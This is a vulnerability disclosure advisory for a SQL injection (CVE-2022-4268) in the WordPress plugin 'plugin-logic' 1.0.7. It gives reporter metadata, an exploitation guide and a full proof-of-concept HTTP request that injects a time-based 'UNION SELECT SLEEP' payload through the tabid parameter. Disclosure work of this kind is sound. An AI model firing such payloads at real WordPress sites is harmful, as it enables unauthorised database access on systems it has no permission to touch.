plugin-logic 1.0.7 WordPress plug-in SQL injection
Vulnerability Metadata
Key | Value |
---|---|
Date of Disclosure | December 02 2022 |
Affected Software | plugin-logic |
Affected Software Type | WordPress plugin |
Version | 1.0.7 |
Weakness | SQL Injection |
CWE ID | CWE-89 |
CVE ID | CVE-2022-4268 |
CVSS 3.x Base Score | n/a |
CVSS 2.0 Base Score | n/a |
Reporter | Kunal Sharma, Daniel Krohmer |
Reporter Contact | k_sharma19@informatik.uni-kl.de |
Link to Affected Software | https://wordpress.org/plugins/plugin-logic/ |
Link to Vulnerability DB | https://nvd.nist.gov/vuln/detail/CVE-2022-4268 |
Vulnerability Description
The tabid
GET query parameter in plugin-logic 1.0.7 is vulnerable to SQL injection. An authenticated attacker may abuse the fetch active plugins functionality in plulo_option_page
function inside plugin-logic.php
. This leads to a threat actor in a multisite
setup crafting a malicious GET request.
Exploitation Guide
Login as admin
user. This attack requires at least admin
privileges.
Note: The plugin should be installed in a multisite network.
Go to PLugin Logic
under Plugins
option on the WordPress site dashboard.
Click Save Changes
on any tab.
Clicking this button triggers the vulnerable request. We have to add an additional GET query parametertabid
in the request.
A POC may look like the following request:
In the code, the vulnerability is triggered by un-sanitized user input of tabid
at line 203
in ./plugin-logic.php
.
At lines 213-216
in ./plugin-logic.php
the database query call on $selected_blog
leads to SQL injection.
Exploit Payload
Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.
The SQL injection can be triggered by sending the request below:
POST /wp-admin/network/plugins.php?page=plugin-logic&tabid=options%2bunion%2bSELECT%2bSLEEP(6)%3b%23 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/network/plugins.php?page=plugin-logic
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
Origin: http://localhost
Connection: close
Cookie: wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1666185599; wp-settings-8=libraryContent%3Dbrowse; wp-settings-time-8=1666389039; wordpress_test_cookie=WP%20Cookie%20check; wordpress_c9db569cb388e160e4b86ca1ddff84d7=newadmin%7C1666566701%7COfIsPG6DZPN1yTZcYsQ9O8Co7ADOvG6nne9kO5iGtqs%7C0abf94c1e22528cf048ff22b03d79223ba73c502056deb9a9ce748fa0c03b2c0; wordpress_logged_in_c9db569cb388e160e4b86ca1ddff84d7=newadmin%7C1666566701%7COfIsPG6DZPN1yTZcYsQ9O8Co7ADOvG6nne9kO5iGtqs%7C9bf5c239139b198a8856c9927f2cf4835b8583556b6e07b6270ec1284a59f953
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
plulo_checklist%5B0%5D=0&plulo_checklist%5B0%5D=1&plulo_radiolist%5B0%5D=0&plulo_txt_list%5B0%5D=&plulo_submit=Save+Changes